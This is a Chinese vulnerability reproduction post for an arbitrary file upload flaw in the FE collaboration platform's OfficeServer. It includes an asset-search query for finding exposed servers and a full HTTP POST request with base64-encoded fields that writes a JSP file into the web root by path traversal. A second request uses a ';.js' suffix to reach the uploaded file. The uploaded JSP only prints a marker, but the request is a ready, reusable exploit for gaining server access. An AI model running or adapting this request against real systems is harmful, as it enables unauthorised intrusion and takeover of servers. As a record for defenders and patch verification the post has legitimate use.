登录 白背景

飞企互联FE业务协作平台OfficeServer任意文件上传漏洞

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台OfficeServer任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。。

二、影响版本

  • 飞企互联FE业务协作平台

三、资产测绘

  • hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
  • 登录页面

image.png

四、漏洞复现

POST /iweboffice/OfficeServer.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
Content-Length: 185
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Accept-Encoding: gzip, deflate

DBSTEP V3.0     93                     0        28              DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=Li4vLi4vLi4vamJvc3Mvd2ViL2ZlLndhci91aWQuanNw
<%out.println("lOKB4C9g");%>

image.png
上传文件位置

GET /uid.jsp;.js HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cookie: JSESSIONID=C02FFC1F802DE5889538E7D4DA810501

image.png
nuclei脚本
飞企互联fe-officeserver-任意文件上传.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/bqasu57lh6hszgqv